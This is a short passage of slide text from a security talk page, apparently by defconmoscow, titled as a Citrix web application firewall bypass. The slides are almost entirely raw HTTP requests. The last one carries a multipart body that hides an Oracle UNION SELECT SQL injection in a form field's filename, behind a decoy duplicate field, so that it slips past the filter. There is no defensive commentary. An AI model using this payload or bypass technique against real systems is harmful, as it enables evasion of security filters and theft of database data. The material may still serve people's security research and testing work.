More Related Content
Similar to Citrix WAF bypass techniques exposed in daily hack report
Similar to Citrix WAF bypass techniques exposed in daily hack report (20)
More from defconmoscow (20)
Citrix WAF bypass techniques exposed in daily hack report
- 3. Daily hack
Citrix WAF Bypass
GET /vulnerable_script HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0)
Gecko/20100101 Firefox/21.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ... citrix_ns_id_ ...
Connection: keep-alive
- 4. Daily hack
POST /vulnerable_script HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0)
Gecko/20100101 Firefox/21.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ... citrix_ns_id_ ...
Connection: keep-alive
Content-Length: 462
Citrix WAF Bypass
- 5. Daily hack
POST /vulnerable_script HTTP/1.1
Host: victim
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:21.0)
Gecko/20100101 Firefox/21.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ... citrix_ns_id_ ...
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------2125014176
Content-Length: 462
Citrix WAF Bypass
- 6. Daily hack
Citrix WAF Bypass
----------2125014176
Content-Disposition: form-data; name="vid"
/***/
----------2125014176
Content-Disposition: form-data; name="vid"; filename="999999' union
select
'aaaaa',SYS.DATABASE_NAME,'bbbb',NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,NULL,NULL,NULL,NULL,null,NULL from dual -- "
1
----------2125014176--
http://bit.ly/1448cRr